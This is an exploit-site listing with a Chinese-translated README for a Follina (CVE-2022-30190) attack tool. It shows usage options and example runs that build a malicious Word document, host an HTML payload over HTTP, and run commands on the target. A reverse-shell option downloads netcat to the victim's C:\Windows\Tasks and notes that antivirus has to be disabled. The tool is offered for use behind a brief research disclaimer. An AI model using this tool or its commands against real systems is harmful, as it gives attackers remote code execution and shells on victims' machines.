Sploitus

Exploit for FOLLINA

kitploit · 2026-08-27

Exploit Code

MARKDOWN82 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TOXICENVELOPE-FOLLINA-CVE-2022-30190
# FOLLINA-CVE-2022-30190

FOLLINA-CVE-2022-30190 的实现

* * *

本仓库包含针对漏洞 `FOLLINA-CVE-2022-30190` 的利用工具

### **免责声明**

本工具仅用于安全测试和研究目的。 克隆/复刻本工具即表示原始开发者不对行为人的行为承担任何责任。

* * *

### **先决条件**

  1. 从此处了解 CVE-2022-30190
  2. 准备测试环境(建议使用 Virtual Box + Vagrant)


  * 从此处下载 VirtualBox
  * 从此处下载 Vagrant
  * 从此处了解 Vagrant CLI



* * *

通过构造恶意的 Microsoft Word 文档来发起 "Follina" MS-MSDT 攻击,并通过 HTTP 服务器托管 payload。 ![](https://raw.githubusercontent.com/toxicenvelope/follina-cve-2022-30190/HEAD/)

### **用法**

root@kitploit:~
    
    
    usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
    
    options:
      -h, --help            显示此帮助信息并退出
      --command COMMAND
                            要在目标上执行的命令(默认:calc)
      --output OUTPUT 
                            输出的恶意文档文件(默认:./follina.doc)
      --interface INTERFACE
                            用于托管 HTTP 服务器的网络接口或 IP 地址(默认:eth0)
      --port PORT           
                            托管 HTTP 服务器的端口(默认:8000)
    

* * *

### **示例**

弹出 `calc.exe`:

root@kitploit:~
    
    
    $ python3 exploit.py   
    [+] copied staging doc /tmp/9mcvbrwo
    [+] created maldoc ./cve202230190.doc
    [+] serving html payload on :8000
    

弹出 `cmd.exe`:

root@kitploit:~
    
    
    $ python3 exploit.py --command "cmd"
    

在端口 9001 上获取反向 shell。注意,这会将 netcat 二进制文件下载到受害者计算机并放置在 `C:\Windows\Tasks` 中。 它不会清理二进制文件。除非禁用防病毒软件,否则会触发防病毒检测。

root@kitploit:~
    
    
    $ python3 exploit.py --reverse 9001
    

![](https://raw.githubusercontent.com/toxicenvelope/follina-cve-2022-30190/HEAD/)